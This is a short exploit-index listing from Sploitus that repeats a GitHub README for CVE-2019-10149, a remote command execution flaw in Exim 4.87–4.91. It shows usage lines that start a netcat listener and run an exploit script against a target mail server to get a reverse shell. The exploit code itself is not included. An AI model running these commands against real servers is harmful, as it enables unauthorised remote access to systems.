Sploitus

Exploit for OS Command Injection in Exim

githubexploit Β· 2019-10-27

Exploit Code

README9 lines
## https://sploitus.com/exploit?id=ADA0DDA5-BF6D-5656-87DA-B9E2BF0777ED
# CVE-2019-10149
CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.

### Example
```
nc -lvp 9000
python ./CVE-2019-10149/exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
```